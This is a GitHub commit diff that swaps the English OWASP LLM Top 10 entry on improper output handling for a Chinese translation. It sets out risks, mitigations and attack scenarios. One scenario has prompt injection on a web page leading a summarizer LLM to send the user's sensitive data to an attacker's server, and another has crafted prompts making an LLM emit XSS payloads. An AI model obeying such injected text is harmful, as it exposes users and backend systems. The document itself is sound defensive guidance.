-
-
Notifications
You must be signed in to change notification settings - Fork 154
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Update LLM05_ImproperOutputHandling.md
Signed-off-by: DistributedApps.AI <[email protected]>
- Loading branch information
1 parent
7b14a03
commit d07c00f
Showing
1 changed file
with
64 additions
and
58 deletions.
There are no files selected for viewing
122 changes: 64 additions & 58 deletions
122
2_0_vulns/translations/zh-CN/LLM05_ImproperOutputHandling.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,59 +1,65 @@ | ||
## LLM05:2025 Improper Output Handling | ||
|
||
### Description | ||
|
||
Improper Output Handling refers specifically to insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems. Since LLM-generated content can be controlled by prompt input, this behavior is similar to providing users indirect access to additional functionality. | ||
Improper Output Handling differs from Overreliance in that it deals with LLM-generated outputs before they are passed downstream whereas Overreliance focuses on broader concerns around overdependence on the accuracy and appropriateness of LLM outputs. | ||
Successful exploitation of an Improper Output Handling vulnerability can result in XSS and CSRF in web browsers as well as SSRF, privilege escalation, or remote code execution on backend systems. | ||
The following conditions can increase the impact of this vulnerability: | ||
- The application grants the LLM privileges beyond what is intended for end users, enabling escalation of privileges or remote code execution. | ||
- The application is vulnerable to indirect prompt injection attacks, which could allow an attacker to gain privileged access to a target user's environment. | ||
- 3rd party extensions do not adequately validate inputs. | ||
- Lack of proper output encoding for different contexts (e.g., HTML, JavaScript, SQL) | ||
- Insufficient monitoring and logging of LLM outputs | ||
- Absence of rate limiting or anomaly detection for LLM usage | ||
|
||
### Common Examples of Vulnerability | ||
|
||
1. LLM output is entered directly into a system shell or similar function such as exec or eval, resulting in remote code execution. | ||
2. JavaScript or Markdown is generated by the LLM and returned to a user. The code is then interpreted by the browser, resulting in XSS. | ||
3. LLM-generated SQL queries are executed without proper parameterization, leading to SQL injection. | ||
4. LLM output is used to construct file paths without proper sanitization, potentially resulting in path traversal vulnerabilities. | ||
5. LLM-generated content is used in email templates without proper escaping, potentially leading to phishing attacks. | ||
|
||
### Prevention and Mitigation Strategies | ||
|
||
1. Treat the model as any other user, adopting a zero-trust approach, and apply proper input validation on responses coming from the model to backend functions. | ||
2. Follow the OWASP ASVS (Application Security Verification Standard) guidelines to ensure effective input validation and sanitization. | ||
3. Encode model output back to users to mitigate undesired code execution by JavaScript or Markdown. OWASP ASVS provides detailed guidance on output encoding. | ||
4. Implement context-aware output encoding based on where the LLM output will be used (e.g., HTML encoding for web content, SQL escaping for database queries). | ||
5. Use parameterized queries or prepared statements for all database operations involving LLM output. | ||
6. Employ strict Content Security Policies (CSP) to mitigate the risk of XSS attacks from LLM-generated content. | ||
7. Implement robust logging and monitoring systems to detect unusual patterns in LLM outputs that might indicate exploitation attempts. | ||
|
||
### Example Attack Scenarios | ||
|
||
#### Scenario #1 | ||
An application utilizes an LLM extension to generate responses for a chatbot feature. The extension also offers a number of administrative functions accessible to another privileged LLM. The general purpose LLM directly passes its response, without proper output validation, to the extension causing the extension to shut down for maintenance. | ||
#### Scenario #2 | ||
A user utilizes a website summarizer tool powered by an LLM to generate a concise summary of an article. The website includes a prompt injection instructing the LLM to capture sensitive content from either the website or from the user's conversation. From there the LLM can encode the sensitive data and send it, without any output validation or filtering, to an attacker-controlled server. | ||
#### Scenario #3 | ||
An LLM allows users to craft SQL queries for a backend database through a chat-like feature. A user requests a query to delete all database tables. If the crafted query from the LLM is not scrutinized, then all database tables will be deleted. | ||
#### Scenario #4 | ||
A web app uses an LLM to generate content from user text prompts without output sanitization. An attacker could submit a crafted prompt causing the LLM to return an unsanitized JavaScript payload, leading to XSS when rendered on a victim's browser. Insufficient validation of prompts enabled this attack. | ||
#### Scenario # 5 | ||
An LLM is used to generate dynamic email templates for a marketing campaign. An attacker manipulates the LLM to include malicious JavaScript within the email content. If the application doesn't properly sanitize the LLM output, this could lead to XSS attacks on recipients who view the email in vulnerable email clients. | ||
#### Scenario #6 | ||
An LLM is used to generate code from natural language inputs in a software company, aiming to streamline development tasks. While efficient, this approach risks exposing sensitive information, creating insecure data handling methods, or introducing vulnerabilities like SQL injection. The AI may also hallucinate non-existent software packages, potentially leading developers to download malware-infected resources. Thorough code review and verification of suggested packages are crucial to prevent security breaches, unauthorized access, and system compromises. | ||
|
||
### Reference Links | ||
|
||
1. [Proof Pudding (CVE-2019-20634)](https://avidml.org/database/avid-2023-v009/) **AVID** (`moohax` & `monoxgas`) | ||
2. [Arbitrary Code Execution](https://security.snyk.io/vuln/SNYK-PYTHON-LANGCHAIN-5411357): **Snyk Security Blog** | ||
3. [ChatGPT Plugin Exploit Explained: From Prompt Injection to Accessing Private Data](https://embracethered.com/blog/posts/2023/chatgpt-cross-plugin-request-forgery-and-prompt-injection./): **Embrace The Red** | ||
4. [New prompt injection attack on ChatGPT web version. Markdown images can steal your chat data.](https://systemweakness.com/new-prompt-injection-attack-on-chatgpt-web-version-ef717492c5c2?gi=8daec85e2116): **System Weakness** | ||
5. [Don’t blindly trust LLM responses. Threats to chatbots](https://embracethered.com/blog/posts/2023/ai-injections-threats-context-matters/): **Embrace The Red** | ||
6. [Threat Modeling LLM Applications](https://aivillage.org/large%20language%20models/threat-modeling-llm/): **AI Village** | ||
7. [OWASP ASVS - 5 Validation, Sanitization and Encoding](https://owasp-aasvs4.readthedocs.io/en/latest/V5.html#validation-sanitization-and-encoding): **OWASP AASVS** | ||
8. [AI hallucinates software packages and devs download them – even if potentially poisoned with malware](https://www.theregister.com/2024/03/28/ai_bots_hallucinate_software_packages/) **Theregiste** | ||
### LLM05:2025 不当输出处理 | ||
|
||
#### 描述 | ||
|
||
不当输出处理指的是在将大语言模型(LLM)生成的输出传递给其他组件和系统之前,未进行充分的验证、清理或处理。由于LLM的生成内容可被输入提示所控制,这种行为类似于为用户提供间接访问附加功能的能力。 | ||
|
||
与过度依赖不同,不当输出处理关注的是LLM生成的输出在传递给下游系统前的验证和清理,而过度依赖则涉及对LLM输出准确性和适用性的依赖。成功利用不当输出处理漏洞可能导致浏览器中的跨站脚本(XSS)和跨站请求伪造(CSRF),以及后端系统的服务器端请求伪造(SSRF)、权限升级或远程代码执行。 | ||
|
||
以下条件可能加重此漏洞的影响: | ||
|
||
- 应用程序赋予LLM的权限超出用户的预期,可能导致权限升级或远程代码执行。 | ||
- 应用程序易受间接提示注入攻击,允许攻击者获得目标用户环境的特权访问。 | ||
- 第三方扩展未对输入进行充分验证。 | ||
- 缺乏针对不同上下文的适当输出编码(如HTML、JavaScript、SQL)。 | ||
- LLM输出的监控和日志记录不足。 | ||
- 缺乏针对LLM使用的速率限制或异常检测。 | ||
|
||
#### 常见漏洞示例 | ||
|
||
1. 将LLM的输出直接输入系统外壳或类似的函数(如`exec`或`eval`),导致远程代码执行。 | ||
2. LLM生成JavaScript或Markdown代码并返回给用户,代码被浏览器解释后引发XSS攻击。 | ||
3. 在未使用参数化查询的情况下执行LLM生成的SQL查询,导致SQL注入。 | ||
4. 使用LLM输出构造文件路径,未进行适当清理时可能导致路径遍历漏洞。 | ||
5. 将LLM生成的内容用于电子邮件模板,未进行适当转义时可能导致钓鱼攻击。 | ||
|
||
#### 防范与缓解策略 | ||
|
||
1. 将模型视为任何其他用户,采用零信任原则,对模型返回的响应进行适当的输入验证。 | ||
2. 遵循OWASP ASVS(应用安全验证标准)指南,确保有效的输入验证和清理。 | ||
3. 对返回用户的模型输出进行编码,以防止JavaScript或Markdown的意外代码执行。OWASP ASVS提供了详细的输出编码指南。 | ||
4. 根据LLM输出的使用场景实施上下文感知的输出编码(如Web内容的HTML编码、数据库查询的SQL转义)。 | ||
5. 对所有涉及LLM输出的数据库操作使用参数化查询或预处理语句。 | ||
6. 实施严格的内容安全策略(CSP),减少LLM生成内容引发的XSS攻击风险。 | ||
7. 部署健全的日志记录和监控系统,以检测LLM输出中的异常模式,防止潜在的攻击尝试。 | ||
|
||
#### 示例攻击场景 | ||
|
||
##### 场景1 | ||
应用程序使用LLM扩展为聊天机器人功能生成响应。扩展还支持多个特权LLM访问管理功能。通用LLM未进行适当输出验证便直接传递响应,导致扩展意外进入维护模式。 | ||
|
||
##### 场景2 | ||
用户使用LLM驱动的网站摘要工具生成文章摘要。网站中嵌入了提示注入,指示LLM捕获敏感数据并将其发送至攻击者控制的服务器,输出缺乏验证和过滤导致数据泄露。 | ||
|
||
##### 场景3 | ||
LLM允许用户通过聊天功能生成后端数据库的SQL查询。一名用户请求生成删除所有表的查询。如果缺乏适当审查,数据库表将被删除。 | ||
|
||
##### 场景4 | ||
一个Web应用使用LLM从用户文本提示生成内容,但未清理输出。攻击者提交构造的提示使LLM返回未清理的JavaScript代码,导致受害者浏览器执行XSS攻击。 | ||
|
||
##### 场景5 | ||
LLM被用来为营销活动生成动态电子邮件模板。攻击者操控LLM在邮件内容中嵌入恶意JavaScript。如果应用程序未对输出进行适当清理,可能导致邮件客户端上的XSS攻击。 | ||
|
||
##### 场景6 | ||
一家软件公司使用LLM根据自然语言输入生成代码以简化开发任务。这种方法虽高效,但存在暴露敏感信息、创建不安全数据处理方法或引入漏洞(如SQL注入)的风险。AI生成幻觉的非存在软件包可能导致开发者下载带有恶意代码的资源。 | ||
|
||
#### 参考链接 | ||
|
||
1. [Proof Pudding (CVE-2019-20634)](https://avidml.org/database/avid-2023-v009/) **AVID** (`moohax` & `monoxgas`) | ||
2. [任意代码执行](https://security.snyk.io/vuln/SNYK-PYTHON-LANGCHAIN-5411357):**Snyk Security Blog** | ||
3. [ChatGPT插件漏洞解释:从提示注入到访问私人数据](https://embracethered.com/blog/posts/2023/chatgpt-cross-plugin-request-forgery-and-prompt-injection./):**Embrace The Red** | ||
4. [新提示注入攻击:ChatGPT Markdown图片可窃取聊天数据](https://systemweakness.com/new-prompt-injection-attack-on-chatgpt-web-version-ef717492c5c2?gi=8daec85e2116):**System Weakness** | ||
5. [不要盲目信任LLM响应。对聊天机器人威胁](https://embracethered.com/blog/posts/2023/ai-injections-threats-context-matters/):**Embrace The Red** | ||
6. [LLM应用的威胁建模](https://aivillage.org/large%20language%20models/threat-modeling-llm/):**AI Village** | ||
7. [OWASP ASVS - 验证、清理和编码](https://owasp-aasvs4.readthedocs.io/en/latest/V5.html#validation-sanitization-and-encoding):**OWASP AASVS** | ||
8. [AI生成幻觉软件包,开发者下载可能含恶意代码](https://www.theregister.com/2024/03/28/ai_bots_hallucinate_software_packages/) **The Register** |